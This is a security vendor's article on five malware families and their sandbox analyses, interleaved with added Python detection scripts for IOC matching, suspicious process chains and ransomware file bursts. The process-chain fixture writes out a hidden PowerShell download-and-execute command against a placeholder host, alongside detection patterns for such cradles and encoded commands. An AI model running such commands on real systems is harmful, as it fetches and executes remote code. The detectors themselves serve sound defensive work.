2024 had its fair share of high-profile cyber attacks, with companies as large as Dell and Ticketmaster falling victim to data breaches and other infrastructure compromises. In 2025, this trend will continue. So, to be prepared for any kind of malware attack, every organization needs to know its cyber enemy in advance. Here are five common malware families that you can start preparing to counter right now.
Lumma
Lumma is a widely available information stealer. It has been openly sold on the Dark Web since 2022. This malware can effectively collect and exfiltrate data from targeted applications, including login credentials, financial information, and personal details.
Lumma is regularly updated to enhance its capabilities. It can log detailed information from compromised systems, such as browsing history and cryptocurrency wallet data. It can also be used to install other malicious software on infected devices. In 2024, Lumma was distributed through various methods, including fake CAPTCHA pages, torrents, and targeted phishing emails.
Analysis of a Lumma Attack
Proactive analysis of suspicious files and URLs inside a sandbox environment can help you prevent a Lumma infection before it reaches a user.
Let's look at how you can do it using ANY.RUN's cloud-based sandbox. It not only delivers definitive verdicts on malware and phishing along with actionable indicators, but also allows real-time interaction with the threat and the system.
Take a look at this analysis of a Lumma attack.
ANY.RUN lets you manually open files and launch executables
It starts with an archive that contains an executable. Once we launch the .exe file, the sandbox automatically logs all processes and network activity, displaying Lumma's actions.
Suricata IDS informs us about a malicious connection to Lumma's C2 server
It connects to its command-and-control (C2) server.
Malicious process responsible for stealing data from the system
Next, it begins to collect and exfiltrate data from the machine.
You can use the IOCs extracted by the sandbox to enhance your detection systems
After finishing the analysis, we can export a report on this sample, featuring all the key indicators of compromise (IOCs) and TTPs that can be used to enrich defenses against potential Lumma attacks on your organization.
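The exported IOCs are only useful once they are matched against your own telemetry, and report formats usually "defang" indicators (hxxp, [.]) so they must be normalized first. The following script is an added example, not code from ANY.RUN or from the page; the IOC list, the `type,value` layout, and the DNS, proxy and EDR log lines are all constructed for illustration, and the domain example-c2.test, the IP 203.0.113.45 and the hash are placeholders rather than real Lumma indicators.

```python
"""Match sandbox-exported IOCs against local log lines.

Added example, not ANY.RUN's code. The IOC export and the log lines are
constructed; a real export will use the sandbox's own format.
"""
import re
from collections import defaultdict

# Constructed IOC export in a simple "type,value" form. Values are
# defanged (hxxp, [.]) the way threat reports usually publish them.
SAMPLE_IOCS = """\
domain,example-c2[.]test
ip,203[.]0[.]113[.]45
url,hxxps://example-c2[.]test/api/upload
sha256,9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08
"""

# Constructed log lines: a DNS query, a proxy entry, an EDR file event,
# and two benign lines that must not match.
SAMPLE_LOGS = [
    "2025-01-08T10:01:02Z dns client=10.0.0.7 query=example-c2.test type=A",
    "2025-01-08T10:01:03Z proxy client=10.0.0.7 url=https://example-c2.test/api/upload status=200",
    "2025-01-08T10:01:05Z edr host=WS-07 event=file_write "
    "sha256=9F86D081884C7D659A2FEAA0C55AD015A3BF4F1B2B0B822CD15D6C15B0F00A08",
    "2025-01-08T10:02:00Z dns client=10.0.0.9 query=updates.example.org type=A",
    "2025-01-08T10:02:10Z proxy client=10.0.0.9 url=https://example.org/ status=200",
]


def refang(value):
    """Undo common defanging so an indicator looks the way it appears in logs."""
    value = value.replace("[.]", ".").replace("(.)", ".")
    value = re.sub(r"^hxxp(s?)://", r"http\1://", value, flags=re.IGNORECASE)
    return value.lower()


def load_iocs(text):
    """Parse 'type,value' lines into {type: set(refanged values)}."""
    iocs = defaultdict(set)
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        kind, value = line.split(",", 1)
        iocs[kind.strip()].add(refang(value.strip()))
    return iocs


def scan_logs(log_lines, iocs):
    """Return (line_no, ioc_type, indicator) for every hit.

    Domains and IPs are matched with boundaries so that example-c2.test
    does not fire on not-example-c2.test; URLs and hashes are matched as
    case-insensitive substrings.
    """
    hits = []
    for n, line in enumerate(log_lines, 1):
        low = line.lower()
        for kind, values in iocs.items():
            for v in values:
                if kind in ("domain", "ip"):
                    pattern = r"(?<![a-z0-9.-])" + re.escape(v) + r"(?![a-z0-9-])"
                    if re.search(pattern, low):
                        hits.append((n, kind, v))
                elif v in low:
                    hits.append((n, kind, v))
    return hits


if __name__ == "__main__":
    for line_no, kind, value in scan_logs(SAMPLE_LOGS, load_iocs(SAMPLE_IOCS)):
        print(f"line {line_no}: {kind} match on {value}")
```

Running it reports the DNS query, the proxy request (as both a domain and a URL hit) and the hash in the file event, while the two benign lines stay silent. The boundary check matters in practice: a bare substring match on a short domain or IP produces noisy false positives on unrelated hostnames and longer addresses.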
Try all features of ANY.RUN's Interactive Sandbox for free with a 14-day trial
XWorm
XWorm is a remote access trojan that gives cybercriminals remote control over infected computers. First appearing in July 2022, it can collect a wide range of sensitive information, including financial details, browsing history, saved passwords, and cryptocurrency wallet data.
XWorm allows attackers to monitor victims' activities by tracking keystrokes, capturing webcam images, listening to audio input, scanning network connections, and viewing open windows. It can also access and manipulate the computer's clipboard, potentially stealing cryptocurrency wallet credentials.
In 2024, XWorm was involved in many large-scale attacks, including ones that abused Cloudflare tunnels and legitimate digital certificates.
Analysis of an XWorm Attack
Phishing emails are often the initial stage of XWorm attacks
In this attack, we can see the original phishing email, which features a link to Google Drive.
A Google Drive page with a download link to a malicious archive
Once we follow the link, we are prompted to download a password-protected archive.
Opened malicious archive with a .vbs file
The password can be found in the email. After entering it, we can access a .vbs script inside the .zip file.
XWorm uses MSBuild.exe to persist on the system
As soon as we launch the script, the sandbox immediately detects malicious activity, which ultimately leads to the deployment of XWorm on the machine.
AsyncRAT
AsyncRAT is another remote access trojan on the list. First seen in 2019, it was initially spread via spam emails, often exploiting the COVID-19 pandemic as a lure. Since then, the malware has gained popularity and been used in various cyber attacks.
AsyncRAT has evolved over time to include a wide range of malicious capabilities. It can secretly record a victim's screen activity, log keystrokes, install additional malware, steal files, maintain a persistent presence on infected systems, disable security software, and launch denial-of-service attacks that overwhelm targeted websites.
In 2024, AsyncRAT remained a significant threat, often disguised as pirated software. It was also one of the first malware families to be distributed as part of complex attacks involving scripts generated by AI.
Analysis of an AsyncRAT Attack
The initial archive with an .exe file
In this analysis session, we can see another archive with a malicious executable inside.
A PowerShell process used for downloading a payload
Detonating the file kicks off the execution chain of AsyncRAT, which involves the use of PowerShell scripts to fetch additional files needed to facilitate the infection.
Once the analysis is complete, the sandbox displays the final verdict on the sample.
Remcos
Remcos is a malware that has been marketed by its creators as a legitimate remote access tool. Since its release in 2016, it has been used in numerous attacks to perform a wide range of malicious actions, including stealing sensitive information, remotely controlling the system, recording keystrokes, capturing screen activity, and so on.
In 2024, campaigns to distribute Remcos used techniques like script-based attacks, which often start with a VBScript that launches a PowerShell script to deploy the malware, and exploited vulnerabilities like CVE-2017-11882 (the Microsoft Office Equation Editor flaw) by leveraging malicious XML files.
Analysis of a Remcos Attack
Phishing email opened in ANY.RUN's Interactive Sandbox
In this example, we are met with another phishing email featuring a .zip attachment and a password for it.
cmd process used during the infection chain
The final payload leverages Command Prompt and Windows system processes to load and execute Remcos.
MITRE ATT&CK matrix provides a comprehensive view of the malware's techniques
The ANY.RUN sandbox maps the entire attack chain to the MITRE ATT&CK matrix for convenience.
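The three RAT walkthroughs above share a pattern worth turning into detection logic: a script host launching PowerShell (the XWorm and Remcos chains), PowerShell fetching a second stage (AsyncRAT), MSBuild.exe spawned under a scripting chain (XWorm persistence), and cmd.exe handing off to an encoded PowerShell command. The script below is an added example, not ANY.RUN's code and not any of these families' actual command lines; the process-creation events are constructed in a Sysmon-like shape, and example.test, the file names and the PIDs are placeholders.

```python
"""Flag suspicious process chains in process-creation telemetry.

Added example, not ANY.RUN's code. Events are constructed; the rules
encode the chains described on the page: script host -> PowerShell,
PowerShell download cradle, MSBuild.exe under a script/PowerShell chain,
and encoded PowerShell commands (here launched via cmd.exe).
"""
import ntpath
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
DOWNLOAD_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I)
# -e / -ec / -enc / -encodedcommand followed by a base64 blob; "-ep bypass" does not match
ENCODED_RE = re.compile(r"(?:^|\s)-e(?:nc|ncodedcommand|c)?\s+[A-Za-z0-9+/=]{8,}", re.I)

RULE_SCRIPT_TO_PS = "script host spawned PowerShell"
RULE_MSBUILD_CHAIN = "MSBuild.exe launched from a script/PowerShell chain"
RULE_PS_DOWNLOAD = "PowerShell download cradle"
RULE_PS_ENCODED = "PowerShell encoded command"

# Constructed process-creation events: (pid, ppid, image path, command line).
# "SQBFAFgA" is base64 of the UTF-16LE string "IEX", a harmless stand-in blob.
SAMPLE_EVENTS = [
    (1000, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    (1100, 1000, r"C:\Windows\System32\wscript.exe",
     r'wscript.exe "C:\Users\u\Downloads\invoice.vbs"'),
    (1200, 1100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
     ".DownloadString('https://example.test/stage2')\""),
    (1300, 1200, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     r"MSBuild.exe C:\Users\u\AppData\Roaming\build.xml"),
    (1400, 1000, r"C:\Program Files\Vendor\setup.exe", "setup.exe"),
    (1500, 1400, r"C:\Windows\System32\cmd.exe", 'cmd.exe /c "powershell -enc SQBFAFgA"'),
    (1600, 1500, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell -enc SQBFAFgA"),
    (1700, 1000, r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir"),
]


def image_name(path):
    """Lower-cased file name of a Windows image path."""
    return ntpath.basename(path).lower()


def ancestors(pid, procs):
    """Yield image names of the parent, grandparent, ... (loop-safe)."""
    seen = set()
    ppid = procs[pid][0] if pid in procs else None
    while ppid in procs and ppid not in seen:
        seen.add(ppid)
        yield image_name(procs[ppid][1])
        ppid = procs[ppid][0]


def detect(events):
    """Return a list of (pid, rule) findings over a batch of events."""
    procs = {pid: (ppid, image, cmd) for pid, ppid, image, cmd in events}
    findings = []
    for pid, ppid, image, cmd in events:
        name = image_name(image)
        chain = list(ancestors(pid, procs))
        parent = chain[0] if chain else None
        if name == "powershell.exe":
            if parent in SCRIPT_HOSTS:
                findings.append((pid, RULE_SCRIPT_TO_PS))
            if DOWNLOAD_RE.search(cmd):
                findings.append((pid, RULE_PS_DOWNLOAD))
            if ENCODED_RE.search(cmd):
                findings.append((pid, RULE_PS_ENCODED))
        elif name == "msbuild.exe" and any(
                a in SCRIPT_HOSTS or a == "powershell.exe" for a in chain):
            findings.append((pid, RULE_MSBUILD_CHAIN))
    return findings


if __name__ == "__main__":
    for pid, rule in detect(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
```

On the constructed batch this flags the wscript-launched PowerShell twice (parentage and download cradle), the MSBuild.exe two levels below it, and the encoded command under cmd.exe, while the plain `cmd.exe /c dir` stays clean. The MSBuild rule walks the whole ancestry rather than checking only the direct parent, since the sandbox traces on this page show the persistence step sitting several processes below the original script; on real hosts, expect developer machines to need an exclusion for legitimate build chains.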
LockBit
LockBit is a ransomware primarily targeting Windows devices. It is considered one of the largest ransomware threats, accounting for a substantial portion of all Ransomware-as-a-Service (RaaS) attacks. The decentralized, affiliate-based nature of the LockBit group has allowed it to compromise numerous high-profile organizations worldwide, including the UK's Royal Mail (in 2023) and India's National Aerospace Laboratories (in 2024).
Law enforcement agencies have taken steps to combat the LockBit group, leading to the arrest of several developers and affiliates. Despite these efforts, the group continues to operate, with plans to release a new version, LockBit 4.0, in 2025.
Analysis of a LockBit Attack
LockBit ransomware launched in the safe environment of the ANY.RUN sandbox
Check out this sandbox session, showing how fast LockBit infects and encrypts files on a system.
ANY.RUN's Interactive Sandbox lets you see static analysis of every modified file on the system
By monitoring file system modifications, we can see it modified 300 files in less than a minute.
Ransom note tells victims to contact attackers
The malware also drops a ransom note, detailing the instructions for getting the data back.
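The rate observed in the sandbox, hundreds of files modified by one process within a minute, is itself a usable detection signal on endpoints. The script below is an added example, not ANY.RUN's code: it replays constructed file-system telemetry (an encryptor renaming 300 documents in 40 seconds alongside a backup agent writing 40 files over five minutes) through a per-process sliding window and raises an alert when the distinct-file count crosses a threshold. The 50-files-per-60-seconds threshold, the `.enc` extension, the paths and the PIDs are assumptions for illustration, not values from the page or from LockBit.

```python
"""Detect ransomware-like file-modification bursts per process.

Added example, not ANY.RUN's code. Events are constructed file-system
telemetry; the threshold and window are illustrative assumptions.
"""
import os
from collections import defaultdict, deque
from datetime import datetime, timedelta

BURST_THRESHOLD = 50                 # distinct files per window (assumed)
BURST_WINDOW = timedelta(seconds=60)  # sliding window length (assumed)


def make_sample_events():
    """Constructed telemetry: (timestamp, pid, image, old_path, new_path).

    new_path is None for an in-place write and a path for a rename.
    """
    base = datetime(2025, 1, 8, 10, 0, 0)
    events = []
    # An encryptor renaming 300 documents to a new extension in 40 seconds.
    for i in range(300):
        ts = base + timedelta(seconds=40 * i / 300)
        p = f"C:\\Users\\u\\Documents\\report{i}.docx"
        events.append((ts, 4242, "C:\\Users\\u\\AppData\\Local\\Temp\\payload.exe", p, p + ".enc"))
    # A backup agent writing 40 files in place over five minutes.
    for i in range(40):
        ts = base + timedelta(seconds=300 * i / 40)
        p = f"C:\\Backups\\set{i}.bak"
        events.append((ts, 880, "C:\\Program Files\\Backup\\agent.exe", p, None))
    events.sort(key=lambda e: e[0])
    return events


def detect_bursts(events, threshold=BURST_THRESHOLD, window=BURST_WINDOW):
    """Return one alert per process whose distinct-file count inside a
    sliding window reaches the threshold.

    Each alert is a dict with pid, image, files (distinct files in the
    window when it fired), ext_changes (renames that changed the file
    extension in that window) and at (timestamp of the triggering event).
    """
    windows = defaultdict(deque)   # pid -> deque of (ts, path, ext_changed)
    alerts = {}
    for ts, pid, image, old_path, new_path in events:
        q = windows[pid]
        ext_changed = (new_path is not None and
                       os.path.splitext(new_path)[1].lower()
                       != os.path.splitext(old_path)[1].lower())
        q.append((ts, old_path, ext_changed))
        while q and ts - q[0][0] > window:
            q.popleft()
        if pid in alerts:
            continue                   # report each process once
        distinct = {p for _, p, _ in q}
        if len(distinct) >= threshold:
            alerts[pid] = {
                "pid": pid,
                "image": image,
                "files": len(distinct),
                "ext_changes": sum(1 for _, _, c in q if c),
                "at": ts,
            }
    return list(alerts.values())


if __name__ == "__main__":
    for a in detect_bursts(make_sample_events()):
        print(f"{a['at'].isoformat()} pid {a['pid']} {a['image']}: "
              f"{a['files']} files, {a['ext_changes']} extension changes")
```

The encryptor trips the threshold about seven seconds in, long before it finishes, while the backup agent never accumulates 50 distinct files inside any 60-second window. Counting extension changes alongside the raw rate helps separate encryption from bulk copying or compilation, which also write many files quickly but keep their extensions; in production the threshold should be tuned per host role and combined with the process-origin signals from the sandbox verdict.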
Improve Your Proactive Security with ANY.RUN's Interactive Sandbox
Analyzing cyber threats proactively instead of reacting to them once they have become a problem for your organization is the best course of action any business can take. Simplify it with ANY.RUN's Interactive Sandbox by examining all suspicious files and URLs inside a safe virtual environment that helps you identify malicious content with ease.
With the ANY.RUN sandbox, your company can:
- Swiftly detect and confirm harmful files and links during scheduled checks.
- Investigate how malware operates on a deeper level to reveal its tactics and techniques.
- Respond to security incidents more effectively by collecting key threat insights through sandbox analysis.
Try all features of ANY.RUN with a 14-day free trial.